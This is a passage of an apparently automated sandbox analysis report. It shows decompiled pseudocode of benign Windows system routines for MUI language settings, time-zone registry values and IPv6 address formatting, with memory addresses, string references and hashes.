				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00778460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0075E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0077718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00778460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0077718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00778460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00778460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00778460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0077718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00752340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0076E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0075E2A8(_t322,  &_v68, _v16);
								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0076E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0075E2A8(_t322,  &_v68, _t236);
								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0077718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00752340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0076E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0075E2A8(_v12,  &_v68, _v16);
							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0076E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0075E2A8(_t322,  &_v68, _t269);
							if(E00775553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0077718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00752340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0076E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0075E2A8(_v12,  &_v68, _v16);
						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0076E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0075E2A8(_t322,  &_v68, _t296);
						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                  0x00778788
                                                  0x00778788
                                                  0x00778791
                                                  0x00778794
                                                  0x00778798
                                                  0x0077879b
                                                  0x0077879e
                                                  0x007787a1
                                                  0x007787a4
                                                  0x007787a7
                                                  0x007787aa
                                                  0x007787af
                                                  0x007c1ad3
                                                  0x00778b0a
                                                  0x00778b0d
                                                  0x00778b13
                                                  0x00778b19
                                                  0x00778b1f
                                                  0x00778b25
                                                  0x00778b2b
                                                  0x00778b31
                                                  0x00778b37
                                                  0x00778b3d
                                                  0x00778b46
                                                  0x00778b46
                                                  0x007787c6
                                                  0x007787d0
                                                  0x007c1ae0
                                                  0x007c1ae6
                                                  0x007c1af8
                                                  0x007c1af8
                                                  0x007c1afd
                                                  0x007c1afe
                                                  0x007c1b01
                                                  0x007c1b06
                                                  0x007c1b06
                                                  0x007787d6
                                                  0x007787f2
                                                  0x007787f7
                                                  0x00778807
                                                  0x0077880a
                                                  0x0077880f
                                                  0x00778810
                                                  0x00778813
                                                  0x00778818
                                                  0x00778818
                                                  0x0077882c
                                                  0x00778831
                                                  0x00778838
                                                  0x00778908
                                                  0x00778920
                                                  0x007789f0
                                                  0x00778a08
                                                  0x00778af6
                                                  0x00778af6
                                                  0x00778af8
                                                  0x00778afb
                                                  0x007c1beb
                                                  0x007c1beb
                                                  0x00778b04
                                                  0x007c1bf8
                                                  0x007c1c0e
                                                  0x007c1c13
                                                  0x007c1c16
                                                  0x007c1c16
                                                  0x007c1bf8
                                                  0x00000000
                                                  0x00778b04
                                                  0x00778a0e
                                                  0x00778a11
                                                  0x00778a14
                                                  0x00778a15
                                                  0x00778a18
                                                  0x00778a22
                                                  0x00778b59
                                                  0x00778a28
                                                  0x00778a3c
                                                  0x00778a3c
                                                  0x00778a42
                                                  0x007c1bb0
                                                  0x007c1b11
                                                  0x007c1b11
                                                  0x00000000
                                                  0x00778a48
                                                  0x00778a51
                                                  0x00778a5b
                                                  0x00778a5e
                                                  0x00778a61
                                                  0x00778a69
                                                  0x00778a69
                                                  0x00778a6d
                                                  0x00000000
                                                  0x00000000
                                                  0x00778a74
                                                  0x00778a7c
                                                  0x00778a7d
                                                  0x00778a91
                                                  0x00778a93
                                                  0x00778a93
                                                  0x00778a98
                                                  0x00778a9b
                                                  0x00778aa1
                                                  0x00778aa1
                                                  0x00778aa4
                                                  0x00778aaa
                                                  0x00778ab1
                                                  0x00778ac5
                                                  0x00778ac7
                                                  0x00778ac7
                                                  0x00778ac5
                                                  0x00778ace
                                                  0x007c1bc9
                                                  0x007c1bce
                                                  0x007c1bd2
                                                  0x007c1bd2
                                                  0x00778ad8
                                                  0x00778aeb
                                                  0x00778aeb
                                                  0x00778af0
                                                  0x00778af4
                                                  0x00000000
                                                  0x00778af4
                                                  0x00778a42
                                                  0x00778926
                                                  0x00778929
                                                  0x0077892c
                                                  0x0077892d
                                                  0x00778930
                                                  0x00778935
                                                  0x0077893a
                                                  0x00778b51
                                                  0x00778940
                                                  0x00778954
                                                  0x00778954
                                                  0x0077895a
                                                  0x007c1b63
                                                  0x00000000
                                                  0x00778960
                                                  0x00778969
                                                  0x00778973
                                                  0x00778976
                                                  0x00778979
                                                  0x0077897e
                                                  0x00778981
                                                  0x00778981
                                                  0x00778986
                                                  0x00000000
                                                  0x00000000
                                                  0x007c1b6e
                                                  0x007c1b74
                                                  0x007c1b7b
                                                  0x007c1b8f
                                                  0x007c1b91
                                                  0x007c1b91
                                                  0x007c1b99
                                                  0x007c1b9c
                                                  0x007c1ba2
                                                  0x007c1ba2
                                                  0x0077898c
                                                  0x00778992
                                                  0x00778999
                                                  0x007789ad
                                                  0x007c1ba8
                                                  0x007c1ba8
                                                  0x007789ad
                                                  0x007789b6
                                                  0x007789c8
                                                  0x007789cd
                                                  0x007789d0
                                                  0x007789d0
                                                  0x007789d6
                                                  0x007789e8
                                                  0x007789e8
                                                  0x007789ed
                                                  0x00000000
                                                  0x007789ed
                                                  0x0077895a
                                                  0x0077883e
                                                  0x00778841
                                                  0x00778844
                                                  0x00778845
                                                  0x00778848
                                                  0x0077884d
                                                  0x00778852
                                                  0x00778b49
                                                  0x00778858
                                                  0x0077886c
                                                  0x0077886c
                                                  0x00778872
                                                  0x007c1b0e
                                                  0x00000000
                                                  0x00778878
                                                  0x00778881
                                                  0x0077888b
                                                  0x0077888e
                                                  0x00778891
                                                  0x00778896
                                                  0x00778899
                                                  0x00778899
                                                  0x0077889e
                                                  0x00000000
                                                  0x00000000
                                                  0x007c1b21
                                                  0x007c1b27
                                                  0x007c1b2e
                                                  0x007c1b42
                                                  0x007c1b44
                                                  0x007c1b44
                                                  0x007c1b4c
                                                  0x007c1b4f
                                                  0x007c1b55
                                                  0x007c1b55
                                                  0x007788a4
                                                  0x007788aa
                                                  0x007788b1
                                                  0x007788c5
                                                  0x007c1b5b
                                                  0x007c1b5b
                                                  0x007788c5
                                                  0x007788ce
                                                  0x007788e0
                                                  0x007788e5
                                                  0x007788e8
                                                  0x007788e8
                                                  0x007788ee
                                                  0x00778900
                                                  0x00778900
                                                  0x00778905
                                                  0x00000000
                                                  0x00778905

                                                  APIs
                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 007789FC
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00778914
                                                  • Kernel-MUI-Language-Allowed, xrefs: 00778827
                                                  • WindowsExcludedProcs, xrefs: 007787C1
                                                  • Kernel-MUI-Number-Allowed, xrefs: 007787E6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: _wcspbrk
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 402402107-258546922
                                                  • Opcode ID: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                                  • Instruction ID: 4d86dd88e29ab23827764064ba8355b6916ea96654b65a300c5fddedc5020bf9
                                                  • Opcode Fuzzy Hash: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                                  • Instruction Fuzzy Hash: 89F107B1D00209EFCF51DF94C989DEEB7B9FF08340F10846AE509A7211EB79AA45DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007E822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E007E822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00805A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00805A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E007A7DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E007E810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E007E810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0074F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                  0x007e8231
                                                  0x007e8235
                                                  0x007e823a
                                                  0x007e8245
                                                  0x007e824b
                                                  0x007e825c
                                                  0x007e8262
                                                  0x007e8263
                                                  0x007e8266
                                                  0x007e8268
                                                  0x00000000
                                                  0x007e826a
                                                  0x007e8270
                                                  0x007e8275
                                                  0x007e8277
                                                  0x007e8295
                                                  0x007e8297
                                                  0x007e838d
                                                  0x007e8391
                                                  0x007e83a9
                                                  0x007e83ab
                                                  0x007e83ad
                                                  0x007e83b6
                                                  0x007e83b9
                                                  0x00000000
                                                  0x007e83b9
                                                  0x007e829d
                                                  0x007e829d
                                                  0x007e82b6
                                                  0x007e82b8
                                                  0x00000000
                                                  0x007e82be
                                                  0x007e82c0
                                                  0x007e82d5
                                                  0x007e82d7
                                                  0x00000000
                                                  0x007e82dd
                                                  0x007e82f3
                                                  0x007e82f5
                                                  0x00000000
                                                  0x007e82fb
                                                  0x007e8317
                                                  0x007e8319
                                                  0x00000000
                                                  0x007e831b
                                                  0x007e8332
                                                  0x007e8334
                                                  0x00000000
                                                  0x007e8336
                                                  0x007e834f
                                                  0x007e8351
                                                  0x00000000
                                                  0x007e8353
                                                  0x007e8353
                                                  0x007e835a
                                                  0x00000000
                                                  0x007e835c
                                                  0x007e8378
                                                  0x007e837a
                                                  0x007e837c
                                                  0x007e8385
                                                  0x007e8388
                                                  0x007e83bc
                                                  0x007e83cf
                                                  0x007e83cf
                                                  0x007e837c
                                                  0x007e835a
                                                  0x007e8351
                                                  0x007e8334
                                                  0x007e8319
                                                  0x007e82f5
                                                  0x007e82d7
                                                  0x007e82b8
                                                  0x007e83d4
                                                  0x007e83d9
                                                  0x007e83d9
                                                  0x007e8277
                                                  0x007e824d
                                                  0x007e824d
                                                  0x007e824d
                                                  0x007e824d
                                                  0x007e83df

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: _wcsnlen
                                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                  • API String ID: 3628947076-1387797911
                                                  • Opcode ID: 5c5da5ff6996c46242d399b7c75514a20b4228e6bf2181124d7c2c8dbc96c1df
                                                  • Instruction ID: 485832f88a80bef3bf712914f386ba20acec131f95b0d9743feab2e5ab16b4be
                                                  • Opcode Fuzzy Hash: 5c5da5ff6996c46242d399b7c75514a20b4228e6bf2181124d7c2c8dbc96c1df
                                                  • Instruction Fuzzy Hash: 8041C771341788FAEB429A92CC46FDF776CAF09B44F100115BA18D91D1DBB8DB50C7A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E007913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x752926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x759cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00787707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00787707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00787707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00787707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                  0x007913d5
                                                  0x007913d9
                                                  0x007913dc
                                                  0x007913de
                                                  0x007913e1
                                                  0x007913e8
                                                  0x007913ee
                                                  0x007be8fd
                                                  0x00000000
                                                  0x007be921
                                                  0x007be921
                                                  0x007be928
                                                  0x007be982
                                                  0x007be98a
                                                  0x00000000
                                                  0x007be99a
                                                  0x007be99e
                                                  0x007be9a3
                                                  0x007be9a8
                                                  0x007be9b9
                                                  0x007be978
                                                  0x00000000
                                                  0x007be978
                                                  0x007be98a
                                                  0x007be92a
                                                  0x007be931
                                                  0x007be944
                                                  0x007be944
                                                  0x007be950
                                                  0x007be954
                                                  0x007be959
                                                  0x007be95e
                                                  0x007be963
                                                  0x007be970
                                                  0x00000000
                                                  0x007be975
                                                  0x007be93b
                                                  0x007be980
                                                  0x00000000
                                                  0x007be980
                                                  0x007be942
                                                  0x007be94b
                                                  0x00000000
                                                  0x007be94b
                                                  0x00000000
                                                  0x007be942
                                                  0x007913f4
                                                  0x007913f4
                                                  0x007913f9
                                                  0x007913fc
                                                  0x007913ff
                                                  0x00791406
                                                  0x007be9cc
                                                  0x007be9d2
                                                  0x007be9d2
                                                  0x007be9cc
                                                  0x0079140c
                                                  0x00791411
                                                  0x00791431
                                                  0x0079143a
                                                  0x0079143c
                                                  0x0079143f
                                                  0x0079143f
                                                  0x00791442
                                                  0x00791447
                                                  0x007914a8
                                                  0x007914ac
                                                  0x007be9e2
                                                  0x007be9e7
                                                  0x007be9ec
                                                  0x007bea05
                                                  0x007bea05
                                                  0x00000000
                                                  0x00791449
                                                  0x00000000
                                                  0x00791449
                                                  0x0079144c
                                                  0x00791459
                                                  0x00791462
                                                  0x00791469
                                                  0x0079146a
                                                  0x00791470
                                                  0x00791473
                                                  0x00791476
                                                  0x00791476
                                                  0x00791490
                                                  0x00791495
                                                  0x0079138e
                                                  0x00791390
                                                  0x00791397
                                                  0x00791398
                                                  0x00791399
                                                  0x007913a1
                                                  0x007913a4
                                                  0x007913a4
                                                  0x00791498
                                                  0x0079149c
                                                  0x0079149f
                                                  0x007914a2
                                                  0x00000000
                                                  0x00000000
                                                  0x007914a4
                                                  0x00000000
                                                  0x007914a4
                                                  0x00791413
                                                  0x00791415
                                                  0x00791416
                                                  0x00791419
                                                  0x0079141c
                                                  0x00791422
                                                  0x007913b7
                                                  0x007913bc
                                                  0x007913bf
                                                  0x007913bf
                                                  0x007913c2
                                                  0x00791424
                                                  0x00791424
                                                  0x00791424
                                                  0x00791427
                                                  0x0079142b
                                                  0x0079142c
                                                  0x0079142c
                                                  0x0079142c
                                                  0x00000000
                                                  0x0079141c
                                                  0x00791411

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                                  • Instruction ID: 525183e150b16c868e4e4a1aed8134cfe34b1cc8fa6301d4ca65260ee5d75097
                                                  • Opcode Fuzzy Hash: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                                  • Instruction Fuzzy Hash: 126147B1900656EACF34DF59D8808FE7BB5EF98301B98C02DE99647640D37CAA54CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00787EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E00787EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
